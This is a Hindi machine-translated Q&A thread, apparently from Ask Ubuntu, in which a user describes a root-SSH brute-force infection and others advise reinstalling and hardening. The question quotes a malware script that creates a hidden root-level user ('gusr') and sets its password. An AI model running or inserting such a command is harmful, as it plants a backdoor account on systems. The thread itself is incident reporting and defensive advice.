मेरे लैपटॉप पर मैलवेयर से कैसे निपटें?

12

मुझे पूरा यकीन है कि मेरा Ubuntu 13.10 लैपटॉप किसी प्रकार के मैलवेयर से संक्रमित है।

हर बार एक समय में, मैं एक प्रक्रिया / परिवाद / sshd (रूट के स्वामित्व में) पाता हूं और बहुत सारे सीपीयू का उपभोग करता हूं। यह sshd सर्वर नहीं है जो / usr / sbin / sshd चलाता है।

बाइनरी में --wxrw-rwt अनुमतियाँ हैं और यह / lib निर्देशिका में स्क्रिप्ट को उत्पन्न और उत्पन्न करता है। हाल ही में एक का नाम 13959730401387633604 है और यह निम्नलिखित कार्य करता है

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Gusr उपयोगकर्ता मालवेयर द्वारा स्वतंत्र रूप से बनाया गया था, और फिर 100% cpu का उपभोग करते समय chpasswd लटका हुआ है।

अब तक, मैंने पहचान लिया है कि gusr उपयोगकर्ता को / etc / में फ़ाइलों के साथ जोड़ा गया था

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

ऐसा लगता है कि मैलवेयर इन सभी फ़ाइलों की प्रतियों को "-" प्रत्यय के साथ बनाता है। / Etc / files की पूरी सूची जो रूट द्वारा संशोधित की गई थी, यहां उपलब्ध है

इसके अलावा, / etc / hosts फाइल करने के लिए बदल गया था यह

/ Lib / sshd /etc/init.d/rc.local फ़ाइल के अंत में खुद को जोड़कर शुरू होता है!

मैंने उपयोगकर्ता को हटा दिया है, फ़ाइलों को हटा दिया है, संसाधित पेड़ को मार दिया है, मेरे पासवॉटरों को बदल दिया है और ssh सार्वजनिक कुंजी को हटा दिया है।

मुझे पता है कि मैं मूल रूप से खराब हूँ, और मैं सबसे अधिक संभावना है कि पूरे सिस्टम को फिर से स्थापित करूँगा। फिर भी, जब से मैं कई अन्य मशीनों में प्रवेश करता हूं, कम से कम इसे हटाने का प्रयास करना अच्छा होगा, और यह पता लगाऊंगा कि मुझे यह कैसे मिला। इस बारे में जाने के लिए कोई सुझाव की सराहना की जाएगी।

ऐसा लगता है जैसे उन्हें 25 मार्च को ब्रूट-फोर्सिंग रूट लॉगिन से मिला था। मुझे नहीं पता था कि उबंटू में डिफ़ॉल्ट रूप से रूट ssh सक्षम है। मैंने इसे निष्क्रिय कर दिया और denyhosts लगा दिया।

लॉगिन जाहिरा तौर पर हांगकांग में 59.188.247.236 था।

मुझे सम्राटलिनक्स से लैपटॉप मिला, और उन्होंने रूट एक्सेस को सक्षम किया। यदि आपके पास उनमें से एक है और आप sshd beware चला रहे हैं।

security  malware 
देजन जोवानोविक
स्रोत
2
अपनी मशीन को नेटवर्क से दूर करें! अभी!
सेठ
2
और आपके पास रूट लॉगिन सक्षम क्यों है? यह एक ऐसी चीज है जिसे आपको अच्छे कारण के बिना सक्षम नहीं करना चाहिए
सेठ
@ सेठ मैंने इसे सक्षम नहीं किया, यह उबंटू में डिफ़ॉल्ट रूप से था। आप जैसे हैं, मैं हैरान हूं।
देजान जोवानोविक
1
" डिफ़ॉल्ट रूप से, दूरस्थ रूट लॉगिन के साथ SSH डेमॉन जहाजों को सक्षम किया गया। सामान्य रूप से उबंटू रूट उपयोगकर्ता तक सीधी पहुंच की अनुमति नहीं देता है, इसलिए यह सेटिंग महत्वहीन है। यदि आपने रूट खाते पर एक पासवर्ड सेट किया है, तो यह सेटिंग एक संभावित हो सकती है। सुरक्षा जोखिम, और अक्षम होना चाहिए। "
सेठ
1
मुझे पूरा यकीन है कि यह नहीं है Linux/Ebury। यह कुछ और है, और संभवतः एक नाम निर्दिष्ट नहीं है। Ebury एक नया उपयोगकर्ता खाता नहीं बनायेगी, और ओपनश द्वारा उपयोग की जाने वाली साझा लाइब्रेरी को संशोधित करेगी, जिसे sshd नामक एक नए बाइनरी में नहीं छोड़ा जाएगा।
रेकिंग

जवाबों:

11

सबसे पहले, अब उस मशीन को नेटवर्क से हटाएं!

दूसरा, आपने रूट खाता क्यों सक्षम किया है? जब तक आपके पास ऐसा करने का एक बहुत अच्छा कारण नहीं है, आपको वास्तव में रूट खाते को सक्षम नहीं करना चाहिए।

तीसरा, हां, यह सुनिश्चित करने का एकमात्र तरीका है कि आप साफ-सुथरे हैं और एक क्लीन इंस्टाल करना है। यह भी सलाह दी जाती है कि आप नए सिरे से शुरुआत करें और एक बैकअप पर वापस न जाएं, क्योंकि आप निश्चित नहीं हो सकते कि यह सब कब शुरू हुआ।

मैं यह भी सुझाव देता हूं कि आप अपनी अगली स्थापना में एक फ़ायरवॉल स्थापित करें और आने वाले सभी कनेक्शनों को अस्वीकार करें: 

sudo ufw default deny incoming

और उसके बाद ssh की अनुमति दें: 

sudo ufw allow ssh

और रूट खाते को सक्षम न करें! निश्चित रूप से सुनिश्चित करें कि रूट ssh लॉगिन अक्षम है।

सेठ
स्रोत
4
मैंने रूट अकाउंट चेक किया। मुझे एम्परलिनक्स से लैपटॉप मिला और उन्होंने इसे स्थापित करने के लिए खाते को सक्षम किया। बेवकूफ।
देजान जोवानोविक
1
@ DejanJovanović यह भयानक है!
सेठ
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.